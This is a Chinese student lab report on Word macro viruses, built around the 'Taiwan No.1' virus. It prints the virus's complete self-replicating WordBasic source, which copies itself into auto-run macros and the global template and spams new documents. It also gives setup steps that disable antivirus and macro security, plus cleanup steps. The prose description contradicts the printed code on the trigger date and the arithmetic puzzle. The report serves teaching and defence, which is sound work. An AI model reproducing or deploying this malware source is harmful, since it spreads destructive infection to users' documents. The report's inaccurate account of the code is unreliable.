计算机病毒
实验报告
姓名：
学号:
老师：
日期：
一. 实验目的
台湾1号病毒是一种破坏力较大的宏病毒！Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过台湾1号病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

二. 实验内容
1. macro virus中的内容
2.计算机病毒篇 ---->计算机宏病毒
三. 实验环境
1. macro virus
硬件设备：局域网，终端PC机。

系统软件：Windows系列操作系统
支撑软件：Word 2003
软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问.
实验环境配置如下图所示：
受感染终端受感染
Word 文档
被感染终端
2.计算机宏病毒
硬件设备：部署 WIN2003 系统的PC 机一台
软件工具：Office word2007
四．实验步骤及截图
台湾1号病毒代码
Taiwan No.1 病毒原始码
Dim Shared nm(4)
Sub MAIN
DisableInput 1
If Day(Now()) = 13 Then
try:
On Error Goto 0
On Error Goto try
test = - 1
con = 1
tog$ = ""
i = 0
While test = - 1
For i = 0 To 4
nm(i) = Int(Rnd() * 10000)
con = (con * nm(i))
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + " =?"
Goto beg
End If
tog$ = tog$ + Str$(nm(i)) + " *"
Next i
rem 随机选出四个千位数, 以便等一下的游戏
Beep
rem 电脑发出" 哔"一声
ans$ = InputBox$("今天是" + Date$() + " ,跟你玩一个心算游戏" + Chr$(13) + /
"若你答错,只好接受震撼教育.............." + Chr$(13) + /
tog$, "台湾NO.1 Macro Virus")
rem 开个对话盒, 以便输入解答用
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
MsgBox "恭贺你答对了,按确定就告诉你想知道的....", /
"台湾NO.1 Macro Virus"
FileNewDefault
CenterPara
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep
Insert "何谓巨集病毒？"
InsertPara
Insert "答案:"
Italic 1
Insert "我就是....."
InsertPara
InsertPara
Italic 0
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep
Insert "如何预防巨集病毒？"
InsertPara
Beep
Insert "答案:"
Italic 1
Insert "不要看我....."
Goto exit
Else
For j = 1 To 20
Beep
FileNewDefault
Next j
CenterPara
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Insert "巨集病毒"
Goto try
End If
Wend
End If
nor = CountMacros(0)
If nor > 0 Then
For kk = 1 To nor
If MacroName$(kk, 0) = "AutoOpen" Then t = 1
End If
Next kk
End If
file$ = FileName$()
filem$ = file$ + ":AutoOpen"
If t <> 1 Then
MacroCopy filem$, "AutoOpen"
MacroCopy filem$, "AutoNew"
MacroCopy filem$, "AutoClose"
End If
nor1 = CountMacros(1)
If nor1 > 0 Then
For kkk = 1 To nor1
If MacroName$(kkk, 1) = "AutoOpen" Then tt = 1
End If
Next kkk
End If
If tt <> 1 Then
FileSaveAs .Format = 1
MacroCopy "AutoOpen", filem$
End If
exit:
End Sub
该病毒的效果如下：当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕：
何谓宏病毒
答案：我就是......
将系统日期设为XX月1号
如果答错，就会不停地刷屏，然后继续让你答题，否则跳出如下界面:
计算机宏病毒
1). 新建Word 文档并打开
2). 调出开发工具,设置宏的等级，启用宏
3). 创建宏，命名AutoExec 编辑
4). 编辑宏，语法上注意VBA 版本保存
5). 关闭所有Word（必须）
6). 再次打开Word 文档，宏病毒爆发,弹出刚刚编写的msgbox 窗口
7). 启动任务管理器结束进程
搜索winword.exe 文件，并确定复制其位置
8). 启用CMD,定位winword 位置：
输入命令，用参数来打开安全模式winword.exe /a（执行此命令2 次）第一次安全模式
第二次新建文档
进行宏的打开设置来禁用宏
9). 搜索normal.dotm 等模板文件，若搜索不出东西，在高级选项中选中搜索隐藏文件及系统文件即可，并删除那个文件夹下的所有模板
10). 简易摆脱宏完成，重新打开word,没有被感染。

五. 总结与心得
在使用电脑的过程中，我们要加强电脑的安全指数，要有防范意识，防止网络病毒的入侵！特别是在现代网络发达的社会，一旦被高级病毒入侵，很有可能带来重大损失！同时也应该学好病毒知识，这样，我们就可以知道如何去解决病毒问题，让我们免受损失！。